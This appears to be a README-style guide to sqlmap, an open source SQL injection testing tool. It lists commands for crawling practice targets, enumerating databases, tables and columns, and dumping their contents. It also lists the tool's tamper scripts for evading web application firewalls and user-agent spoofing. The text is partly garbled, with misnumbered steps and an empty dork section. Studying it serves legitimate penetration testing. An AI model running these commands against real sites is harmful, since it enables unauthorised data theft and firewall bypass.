
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database

MIT LicenseMIT


sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database


Basic Command:

  1. Crawling for SQL Inject Parameters.


   sqlmap -u altor.testfire.php --crawl <1-3>
  1. To get the Database name, we use

    sqlmap -u altor.testfire.php --crawl <1-3> --dbs
  2. To get the tables name, we use command --tables. In this case we have to replace the --dbs with -D 'Database-name'

  3. Get the columns name. For that we'll use command --columns. In this case we have to replace the --dbs with -D & --tables with -T

To get the database names and details.

  1. To dump the tables/contents. Use command --dump.

Google Dork SQL Injection:


Extra Features:

  1. Thread: To increase the concurrent users attacking simultanously. Range 1-10

  2. Risk: If we want to increase the risk or different type of queries. Ex: Update/Delete/Insert etc. Range 1-3

  3. Level: To increase the different parameters for SQL injection attack. Command --level 1-5

  4. Verbosity: We can view the detailed request which is being sent by sqlmap. Command: -v 0-6


[17:04:37] [TRAFFIC OUT] HTTP request [#25]: GET http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3/ HTTP/1.1 Cache-control: no-cache User-agent: sqlmap/ (https://sqlmap.org) Host: testphp.vulnweb.com Accept: / Accept-encoding: gzip,deflate Connection: close

GET / HTTP/1.1 Referrer: xyz.com User-agent: GECKO_Chrome Host: testphp.vulnweb.com Accept: / Accept-encoding: gzip,deflate Connection: close

  1. Output: we can use --output-dir or we can use >

  2. mobile: To trick server thinking that request is being sent from a mobile phone.

which smartphone do you want sqlmap to imitate through HTTP User-Agent header? [1] Apple iPhone 8 (default) [2] BlackBerry Z10 [3] Google Nexus 7 [4] Google Pixel [5] HP iPAQ 6365 [6] HTC 10 [7] Huawei P8 [8] Microsoft Lumia 950 [9] Nokia N97 [10] Samsung Galaxy S8 [11] Xiaomi Mi 8 Pro

  1. Tamper List: It is used to bypass the firewall by encoding the keywords, command “sqlmap –list-tampers”. It can be used using command —tamper=. Example: --tamper=base64encode.

listing available tamper scripts

  • 0eunion.py - Replaces instances of UNION with e0UNION
  • apostrophemask.py - Replaces apostrophe character (') with its UTF-8 full width counterpart (e.g. ' -> %EF%BC%87)
  • apostrophenullencode.py - Replaces apostrophe character (') with its illegal double unicode counterpart (e.g. ' -> %00%27)
  • appendnullbyte.py - Appends (Access) NULL byte character (%00) at the end of payload
  • base64encode.py - Base64-encodes all characters in a given payload
  • between.py - Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #' and equals operator ('=') with 'BETWEEN # AND #'
  • binary.py - Injects keyword binary where possible
  • bluecoat.py - Replaces space character after SQL statement with a valid random blank character. Afterwards replace character '=' with operator LIKE
  • chardoubleencode.py - Double URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %2553%2545%254C%2545%2543%2554)
  • charencode.py - URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %53%45%4C%45%43%54)
  • charunicodeencode.py - Unicode-URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %u0053%u0045%u004C%u0045%u0043%u0054)
  • charunicodeescape.py - Unicode-escapes non-encoded characters in a given payload (not processing already encoded) (e.g. SELECT -> \u0053\u0045\u004C\u0045\u0043\u0054)
  • commalesslimit.py - Replaces (MySQL) instances like 'LIMIT M, N' with 'LIMIT N OFFSET M' counterpart
  • commalessmid.py - Replaces (MySQL) instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)' counterpart
  • commentbeforeparentheses.py - Prepends (inline) comment before parentheses (e.g. ( -> /**/()
  • concat2concatws.py - Replaces (MySQL) instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)' counterpart
  • dunion.py - Replaces instances of UNION with DUNION
  • equaltolike.py - Replaces all occurrences of operator equal ('=') with 'LIKE' counterpart
  • equaltorlike.py - Replaces all occurrences of operator equal ('=') with 'RLIKE' counterpart
  • escapequotes.py - Slash escape single and double quotes (e.g. ' -> ')
  • greatest.py - Replaces greater than operator ('>') with 'GREATEST' counterpart
  • halfversionedmorekeywords.py - Adds (MySQL) versioned comment before each keyword
  • hex2char.py - Replaces each (MySQL) 0x encoded string with equivalent CONCAT(CHAR(),...) counterpart
  • htmlencode.py - HTML encode (using code points) all non-alphanumeric characters (e.g. ' -> ')
  • ifnull2casewhenisnull.py - Replaces instances like 'IFNULL(A, B)' with 'CASE WHEN ISNULL(A) THEN (B) ELSE (A) END' counterpart
  • ifnull2ifisnull.py - Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)' counterpart
  • informationschemacomment.py - Add an inline comment (/**/) to the end of all occurrences of (MySQL) "information_schema" identifier
  • least.py - Replaces greater than operator ('>') with 'LEAST' counterpart
  • lowercase.py - Replaces each keyword character with lower case value (e.g. SELECT -> select)
  • luanginx.py - LUA-Nginx WAFs Bypass (e.g. Cloudflare)
  • misunion.py - Replaces instances of UNION with -.1UNION
  • modsecurityversioned.py - Embraces complete query with (MySQL) versioned comment
  • modsecurityzeroversioned.py - Embraces complete query with (MySQL) zero-versioned comment
  • multiplespaces.py - Adds multiple spaces (' ') around SQL keywords
  • ord2ascii.py - Replaces ORD() occurences with equivalent ASCII() calls
  • overlongutf8.py - Converts all (non-alphanum) characters in a given payload to overlong UTF8 (not processing already encoded) (e.g. ' -> %C0%A7)
  • overlongutf8more.py - Converts all characters in a given payload to overlong UTF8 (not processing already encoded) (e.g. SELECT -> %C1%93%C1%85%C1%8C%C1%85%C1%83%C1%94)
  • percentage.py - Adds a percentage sign ('%') infront of each character (e.g. SELECT -> %S%E%L%E%C%T)
  • plus2concat.py - Replaces plus operator ('+') with (MsSQL) function CONCAT() counterpart
  • plus2fnconcat.py - Replaces plus operator ('+') with (MsSQL) ODBC function {fn CONCAT()} counterpart
  • randomcase.py - Replaces each keyword character with random case value (e.g. SELECT -> SEleCt)
  • randomcomments.py - Add random inline comments inside SQL keywords (e.g. SELECT -> S//E//LECT)
  • schemasplit.py - Splits FROM schema identifiers (e.g. 'testdb.users') with whitespace (e.g. 'testdb 9.e.users')
  • sleep2getlock.py - Replaces instances like 'SLEEP(5)' with (e.g.) "GET_LOCK('ETgP',5)"
  • sp_password.py - Appends (MsSQL) function 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs
  • space2comment.py - Replaces space character (' ') with comments '/**/'
  • space2dash.py - Replaces space character (' ') with a dash comment ('--') followed by a random string and a new line ('\n')
  • space2hash.py - Replaces (MySQL) instances of space character (' ') with a pound character ('#') followed by a random string and a new line ('\n')
  • space2morecomment.py - Replaces (MySQL) instances of space character (' ') with comments '/_/'
  • space2morehash.py - Replaces (MySQL) instances of space character (' ') with a pound character ('#') followed by a random string and a new line ('\n')
  • space2mssqlblank.py - Replaces (MsSQL) instances of space character (' ') with a random blank character from a valid set of alternate characters
  • space2mssqlhash.py - Replaces space character (' ') with a pound character ('#') followed by a new line ('\n')
  • space2mysqlblank.py - Replaces (MySQL) instances of space character (' ') with a random blank character from a valid set of alternate characters
  • space2mysqldash.py - Replaces space character (' ') with a dash comment ('--') followed by a new line ('\n')
  • space2plus.py - Replaces space character (' ') with plus ('+')
  • space2randomblank.py - Replaces space character (' ') with a random blank character from a valid set of alternate characters
  • substring2leftright.py - Replaces PostgreSQL SUBSTRING with LEFT and RIGHT
  • symboliclogical.py - Replaces AND and OR logical operators with their symbolic counterparts (&& and ||)
  • unionalltounion.py - Replaces instances of UNION ALL SELECT with UNION SELECT counterpart
  • unmagicquotes.py - Replaces quote character (') with a multi-byte combo %BF%27 together with generic comment at the end (to make it work)
  • uppercase.py - Replaces each keyword character with upper case value (e.g. select -> SELECT)
  • varnish.py - Appends a HTTP header 'X-originating-IP' to bypass Varnish Firewall
  • versionedkeywords.py - Encloses each non-function keyword with (MySQL) versioned comment
  • versionedmorekeywords.py - Encloses each keyword with (MySQL) versioned comment
  • xforwardedfor.py - Append a fake HTTP header 'X-Forwarded-For' (and alike)